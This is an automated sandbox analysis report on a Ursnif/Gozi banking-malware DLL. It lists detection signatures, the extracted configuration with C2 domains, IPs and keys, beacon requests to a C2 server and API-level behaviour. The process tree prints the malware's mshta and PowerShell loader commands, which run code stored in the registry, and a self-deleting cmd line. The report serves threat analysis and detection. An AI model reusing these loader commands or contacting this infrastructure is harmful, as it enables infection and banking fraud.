
Windows Analysis Report
zs5n5sI6N2

Overview

General Information

Sample Name: zs5n5sI6N2 (renamed file extension from none to dll)
Analysis ID: 633919
MD5: 9ce6868cb546819a7ba2fc27f91a3777
SHA1: 6052120b0375f44ede4985ad98f7bd89beb70c2b
SHA256: fc4bee1a68545b7067fad93ba74478641acd683117f9fe478a4941d7146db959
Tags: dll, Gozi, ITA, ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 3456 cmdline: loaddll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6012 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4452 cmdline: rundll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 6364 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • cmd.exe (PID: 260 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\zs5n5sI6N2.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • PING.EXE (PID: 5988 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
            • RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
            • cmd.exe (PID: 2960 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1759.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • WerFault.exe (PID: 3176 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 272 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 1800 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 408 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5172 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 436 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • mshta.exe (PID: 6732 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cwbm='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cwbm).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name asytsrjo -value gp; new-alias -name famnsyvweq -value iex; famnsyvweq ([System.Text.Encoding]::ASCII.GetString((asytsrjo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 7156 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5080 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBB61.tmp" "c:\Users\user\AppData\Local\Temp\rn2v1u0v\CSCE8729092494447E68BAFD2B3DE7C4FE.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5092 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6392 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDBAB.tmp" "c:\Users\user\AppData\Local\Temp\0rxpcrxp\CSC81748258BEC6426288BE9680C960B04E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup
{"RSA Public Key": "2FCnIUzdNGgeELQ1eLj0bJoMz6Wyhsxr173krpubnAkBznOw2O4zXiS7ovCR4PNNsCIjegHbTvoHWqhvq9RRNZAEBtDWX6mW3yIDXSN0qA1n8qiSRebn1HxZtuyL6FY/BR1nMcmDUet9iMwvlRDxmj+VzyCObUK6W0DHCUtNCB3pyymvgBuZvmOoqHVPJIhNG61j6VPVajqzr24KUke3teaWIZiCXT2orfIpBZFefRCfYuOYhoPg/LDJjkEBPCd72OAc2ekKwF9Tcjmm1Qm9F8aB637Mj7oTJWG5gIc8figdfCIcJsfVqtjVSAcA29hI94eg/OsMoQ7GmaQR3NS4pkbIWbvv0j+obPcxvU7II18=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "37.10.71.138", "185.158.250.51"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Yara matches in memory dumps (Source | Rule | Description | Author):
00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.324102664.0000000005298000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.323570193.0000000005298000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
00000003.00000003.505479603.0000000004B79000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
(22 further entries not shown)

Yara matches in unpacked PE files (Source | Rule | Description | Author):
3.3.rundll32.exe.4b794a0.10.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
3.3.rundll32.exe.4b794a0.10.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
3.2.rundll32.exe.1000000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
3.3.rundll32.exe.5246b48.2.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
3.3.rundll32.exe.52194a0.1.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
(4 further entries not shown)

No Sigma rule has matched
Snort IDS alerts:

Timestamp: 05/25/22-11:27:05.996967
SID: 2033203
Source IP: 192.168.2.4
Source Port: 49765
Destination IP: 13.107.42.16
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/25/22-11:27:05.996967
SID: 2033204
Source IP: 192.168.2.4
Source Port: 49765
Destination IP: 13.107.42.16
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/25/22-11:27:28.182548
SID: 2033203
Source IP: 192.168.2.4
Source Port: 49771
Destination IP: 176.10.119.68
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/25/22-11:27:27.011665
SID: 2033204
Source IP: 192.168.2.4
Source Port: 49771
Destination IP: 176.10.119.68
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: Ursnif (the extracted configuration is identical to the one listed above, after the process tree)
Source: zs5n5sI6N2.dll ReversingLabs: Detection: 41%
Source: http://176.10.119.68/ Avira URL Cloud: Label: phishing
Source: http://176.10.119.68/drew/ELiX5C1LBrOXGVb_2F7VT_2/F3y7AZYCgC/OAzMBADjwIAAgevJ7/Ln8DdTMzAOtI/oaRRlHeZ Avira URL Cloud: Label: phishing
Source: http://176.10.119.68/drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pB9pAoQo46tq53qB/yLUp2d5T9/j5s74YMStQa0vycAYVnz/i1_2BT1sbtGbsqmiKYJ/utxS2UAD48D_2FhKmTNhPj/C7HmcyJhh_2BI/RoK5qxzW/AONvbwwgZ6joXACVCUjXkBm/TrT5RUjDbT/JqnBRntI67DVKvl4U/zabjaRP4H3Fa/y7F2cIC4htT/NfLmrAWL7x6jSO/onSOjeHvFKi2HNfNhR_2F/KXsh6.jlk Avira URL Cloud: Label: phishing
Source: http://176.10.119.68/drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftco/TjSDtFakSde/soGhjhBV5Tb5mX/q7nM_2FDyGsXlD3E3A4fe/_2ByGCIGrgekC2k4/_2BIghzEoEtICMG/eMdl_2FVYz1Gzr3rXb/6bQxvF882/0gJazcAIQC6vmyI4DEnR/k0LRXXmFX8YlpSLVUNq/6DaeywiN2GwHaJFGl8Ik7G/m9UBKgfO4ybSV/fnhYeS0x/hab1JQvgZCtDWyU/A.jlk Avira URL Cloud: Label: phishing
Source: http://176.10.119.68/drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pB Avira URL Cloud: Label: phishing
Source: http://176.10.119.68/drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftco Avira URL Cloud: Label: phishing
Source: zs5n5sI6N2.dll Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_01005FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_01005FBB
Source: zs5n5sI6N2.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: Binary string: uwGXyM.pdb source: loaddll32.exe, 00000000.00000000.283526713.000000000040D000.00000002.00000001.01000000.00000003.sdmp, zs5n5sI6N2.dll
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.444837399.0000000006100000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.443008243.0000000006050000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.444837399.0000000006100000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.443008243.0000000006050000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05B665C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,3_2_05B665C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05B699BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_05B699BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05B7BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_05B7BAD1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05B6FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,3_2_05B6FD47

Networking

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 176.10.119.68:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49765 -> 13.107.42.16:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49765 -> 13.107.42.16:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49771 -> 176.10.119.68:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49771 -> 176.10.119.68:80
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: Joe Sandbox View ASN Name: AS-SOFTPLUSCH
Source: global traffic HTTP traffic detected: GET /drew/ELiX5C1LBrOXGVb_2F7VT_2/F3y7AZYCgC/OAzMBADjwIAAgevJ7/Ln8DdTMzAOtI/oaRRlHeZd85/z64fb0RLSddtHF/rHMZD1_2FqMPdbWOBNRMe/v9EppSM4NhIsm8SQ/XAUtOy4sCW68iNX/Cmaw_2Ff5hh5_2FyXv/eA_2Fri4K/swu3zwi7P_2FcYbL_2Bx/W02PomqcfEjRbitbvf6/IXpVMOx_2BSCAzr10HE5Rp/jnPQORhN2og07/6kVbs5lO/NwTvbwc1Won8BiTcK1YZBEd/L7l.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 176.10.119.68 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftco/TjSDtFakSde/soGhjhBV5Tb5mX/q7nM_2FDyGsXlD3E3A4fe/_2ByGCIGrgekC2k4/_2BIghzEoEtICMG/eMdl_2FVYz1Gzr3rXb/6bQxvF882/0gJazcAIQC6vmyI4DEnR/k0LRXXmFX8YlpSLVUNq/6DaeywiN2GwHaJFGl8Ik7G/m9UBKgfO4ybSV/fnhYeS0x/hab1JQvgZCtDWyU/A.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 176.10.119.68 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pB9pAoQo46tq53qB/yLUp2d5T9/j5s74YMStQa0vycAYVnz/i1_2BT1sbtGbsqmiKYJ/utxS2UAD48D_2FhKmTNhPj/C7HmcyJhh_2BI/RoK5qxzW/AONvbwwgZ6joXACVCUjXkBm/TrT5RUjDbT/JqnBRntI67DVKvl4U/zabjaRP4H3Fa/y7F2cIC4htT/NfLmrAWL7x6jSO/onSOjeHvFKi2HNfNhR_2F/KXsh6.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: 176.10.119.68 | Connection: Keep-Alive | Cache-Control: no-cache
Source: rundll32.exe, 00000003.00000003.385741763.0000000000F43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.370400985.0000000000F44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.10.119.68/
Source: rundll32.exe, 00000003.00000003.370432738.0000000000F55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.10.119.68/drew/ELiX5C1LBrOXGVb_2F7VT_2/F3y7AZYCgC/OAzMBADjwIAAgevJ7/Ln8DdTMzAOtI/oaRRlHeZ
Source: rundll32.exe, 00000003.00000002.507972580.0000000000F55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.10.119.68/drew/RGq_2BVJ/3BCdlnfIA49R8s_2BXe1s3i/VFrZ4awbB4/zmZ34_2Bwuhkj_2Fp/SYr8rby3ftco
Source: rundll32.exe, 00000003.00000002.507870462.0000000000F45000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://176.10.119.68/drew/bht18BKt3t1ka1/EyRQXKSxK1fGGVQT69xe7/l12WvU97arR8lucE/BPan_2BqxdC9XZm/a6pB
Source: rundll32.exe, 00000003.00000003.385741763.0000000000F43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.370400985.0000000000F44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.507870462.0000000000F45000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://config.edge.skype.com/drew/MhUMoFyOZh9qYvrOpwdPHz/hMGU1NSaMibeb/gbf3D
Source: rundll32.exe, 00000003.00000003.385741763.0000000000F43000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.370400985.0000000000F44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.507870462.0000000000F45000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://config.edge.skype.com/drew/MhUMoFyOZh9qYvrOpwdPHz/hMGU1NSaMibeb/gbf3DosK/m_2FDcmJcUXkMB1YR9WE
Source: rundll32.exe, 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000019.00000003.464926394.0000020923589000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000003.00000003.431296892.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.458070359.0000000005FB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000003.469656953.0000020923FDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450528570.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001E.00000003.450680701.000001F31E7EC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_01001CA5 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,3_2_01001CA5

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4452, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 6364, type: MEMORYSTR

E-Banking Fraud

Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4452, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 6364, type: MEMORYSTR
Source: C:\Windows\explorer.exe | Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_01005FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError

System Summary

Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: zs5n5sI6N2.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 272
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B78E57 CreateProcessAsUserW
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_01006D0A NtMapViewOfSection
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_0100190C GetProcAddress,NtCreateSection,memset
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_01004321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_010084C1 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B76DE0 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B674AE NtQueryInformationProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B6C431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B70782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B7BE80 NtMapViewOfSection
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B761AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B6710A GetProcAddress,NtCreateSection,memset
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B77950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B700DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B7A806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B72331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B75312 NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B664C4 memset,NtQueryInformationProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B6B7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B6D77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B636BB NtGetContextThread,RtlNtStatusToDosError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B610C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B73829 NtQuerySystemInformation,RtlNtStatusToDosError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B7EAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_05B75220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\System32\control.exe | Code function: 30_2_0080583C NtCreateSection
Source: C:\Windows\System32\control.exe | Code function: 30_2_007F40C0 NtReadVirtualMemory
Source: C:\Windows\System32\control.exe | Code function: 30_2_008041D8 NtMapViewOfSection
Source: C:\Windows\System32\control.exe | Code function: 30_2_0081A148 NtQueryInformationProcess
Source: C:\Windows\System32\control.exe | Code function: 30_2_007FAA6C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification
Source: C:\Windows\System32\control.exe | Code function: 30_2_008104CC NtAllocateVirtualMemory
Source: C:\Windows\System32\control.exe | Code function: 30_2_007F6D24 NtWriteVirtualMemory
Source: C:\Windows\System32\control.exe | Code function: 30_2_007F65E4 NtQueryInformationToken,NtQueryInformationToken,NtClose
Source: C:\Windows\System32\control.exe | Code function: 30_2_007F9660 NtSetContextThread,NtUnmapViewOfSection,NtClose
Source: C:\Windows\System32\control.exe | Code function: 30_2_0082F002 NtProtectVirtualMemory,NtProtectVirtualMemory
